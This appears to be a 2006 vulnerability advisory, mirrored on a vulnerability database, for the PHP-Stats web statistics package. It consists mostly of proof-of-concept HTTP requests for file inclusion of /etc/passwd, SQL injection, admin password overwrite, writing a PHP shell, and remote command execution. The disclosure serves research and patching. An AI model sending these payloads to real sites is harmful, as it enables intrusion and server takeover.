Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11698
HistoryMar 05, 2006 - 12:00 a.m.

PHP-Stats <= 0.1.9.1 remote commands execution

2006-03-0500:00:00
vulners.com
25
JSON

------------- PHP-Stats <= 0.1.9.1 remote commands execution -------------------

software:
site: http://www.phpstats.net/
description: Open source statistical package for PHP enabled web sites

i) vulnerable code in admin.php (and in nearly every scripts…) at line 65:


if(isset($_POST['option'])) { while (list ($key, $value) = each ($tmpOption)) $option[$key]=$value; }

you can overwrite at run-time the "option[]" array…,
raising SQL injection, arbitrary local inclusion and php injection issues, poc:

i.a) arbitrary local inclusion (with magic_quotes_gpc off):

i.a1)
POST [path]admin.php?do=0 HTTP/1.1\r\n";
Content-Type: application/x-www-form-urlencoded
Host: [somehost]
Content-Length: [data_length]
Connection: Close

option=&option[clear_cache]=1&option[language]=…/…/…/…/…/…/etc/passwd[null char]

i.a2)
POST [path]admin.php?do=0 HTTP/1.1\r\n";
Content-Type: application/x-www-form-urlencoded
Host: [somehost]
Content-Length: [data_length]
Connection: Close

option=&option[template]=…/…/…/…/…/…/etc/passwd[null char]

i.b) SQL injection - you can inject arbitrary SQL commands through the table
prefix, regardless of magic_quotes_gpc settings:

POST [path]admin.php?do=0 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: [somehost]
Content-Length: [data_length]
Connection: Close

option=&option[prefix]=[SQL]

i.c) PHP code injection - you can grant administrative privileges, overwriting
"option[admin_pass]" value and building a MD5 admin cookie on new value.
Now you can inject a shell in two different ways by administrative features,
poc:

i.c1)
POST [path]admin.php?action=esclusioni&opzioni=excfol HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: php_stats_cache=1; pass_cookie=[md5 hash of "suntzu"]
Host: [somehost]
Content-Length: [data_length]
Connection: Close

option=&option[admin_pass]=suntzu&option_new=[SHELL]

now you can launch commands including option/php-stats-options.php script,poc:

POST [path]admin.php?cmd=netstat%20-ano&do=0 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: [somehost]
Content-Length: [data_length]
Connection: Close

option=&option[language]=…/option/php-stats-options.php[null char]

i.c2) the most chritical, this works regardless of any php.ini settings, you
can inject a shell in config.php and launch commands from it.
Poc exploit here:

http://retrogod.altervista.org/php_stats_0191_xpl.html

ii) vulnerable code in click.php at line 18:


if(isset($_SERVER['REMOTE_ADDR'])) $ip=(isset($_SERVER['HTTP_PC_REMOTE_ADDR']) ?
$_SERVER['HTTP_PC_REMOTE_ADDR'] : $_SERVER['REMOTE_ADDR']);

and line 65:


$result=sql_query("SELECT visitor_id FROM $option[prefix]_cache WHERE user_id='$ip' LIMIT 1");

you can inject sql commands through PC_REMOTE_ADDR http header, poc:

GET [path]click.php?id=1&get=1 HTTP/1.1
PC_REMOTE_ADDR: 'UNION SELECT '[code]'INTO OUTFILE 'shell.php' FROM php_stats_cache/*
Host: [host]
Connection: Close

iii) information disclosure, you can go to:

http://[target]/[path]/checktables.php

to see at screen database table_prefix, making easier the exploitation process…

rgod

site: http://retrogod.altervista.org
mail: rgod at autistici.org
original advisory: http://retrogod.altervista.org/php_stats_0191_adv.html

JSON